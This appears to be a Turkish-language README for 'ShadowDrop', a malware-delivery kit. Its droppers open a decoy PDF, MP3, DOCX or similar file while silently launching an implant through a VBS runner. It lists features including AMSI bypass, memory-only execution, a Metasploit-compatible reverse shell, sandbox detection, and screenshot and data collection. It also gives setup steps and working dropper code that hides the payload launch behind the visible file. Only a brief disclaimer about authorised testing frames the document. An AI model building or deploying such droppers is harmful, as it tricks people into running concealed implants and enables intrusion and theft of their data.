ShadowDrop, PDF, MP3, JPEG, DOCX, ZIP gibi masum görünen dosyaları açarken arka planda tam fonksiyonlu bir APT implantı başlatır.
Bu implant rubber_final.py üzerinden çalışır ve ters bağlantı kurar ya da fallback yapar.
ShadowDrop/
├── src/
│ ├── dropper_pdf.py → PDF için açıcı & payload tetikleyici
│ ├── dropper_mp3.py → MP3
│ ├── dropper_docx.py → DOCX
│ ├── dropper_mp4.py → MP4
│ ├── dropper_xlsx.py, ... → Diğer formatlar
│ ├── dropper_docm.py → Makrolu Word
│ ├── dropper_js.py → JS tuzağı
│ └── payload_runner.vbs → rubber_final.py'yi sessiz başlatır
├── files/
│ └── (BOŞ) → Kendi PDF, JPEG, DOCX, ZIP dosyalarınızı buraya koyun
├── README.md → Bu açıklama dosyası
└── requirements.txt → Gerekli pip bağımlılıkları
files/ klasörüne kendi dosyanı koy.
Örnek: files/benimodevim.pdf
Örnek olarak src/dropper_pdf.py dosyasını:
real_file = "files/benimodevim.pdf"olarak değiştir. Bu, kullanıcının tıkladığı anda açılacak dosyadır.
pip install -r requirements.txt
python src/dropper_pdf.pyBu komut:
- Gerçek PDF dosyasını açar (kullanıcı görür)
- Arka planda
payload_runner.vbsçalışır - Bu da
rubber_final.pydosyasınıpythonw.exeile başlatır (sessizce)
- ✅ AMSI bypass
- ✅ Memory-only çalıştırma
- ✅ Reverse shell (Metasploit uyumlu)
- ✅ Sandbox tespiti
- ✅ Fallback modu (info toplar, ekran görüntüsü alır, zip yapar)
import os
import subprocess
real_file = "files/seninbelgen.pdf"
try:
subprocess.Popen(["wscript.exe", "src/payload_runner.vbs"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except:
pass
try:
os.startfile(real_file)
except:
passBu araç sadece izinli test ortamlarında ve eğitim amaçlı kullanılabilir.
Kötüye kullanımı yasa dışıdır ve tüm sorumluluk kullanıcıya aittir.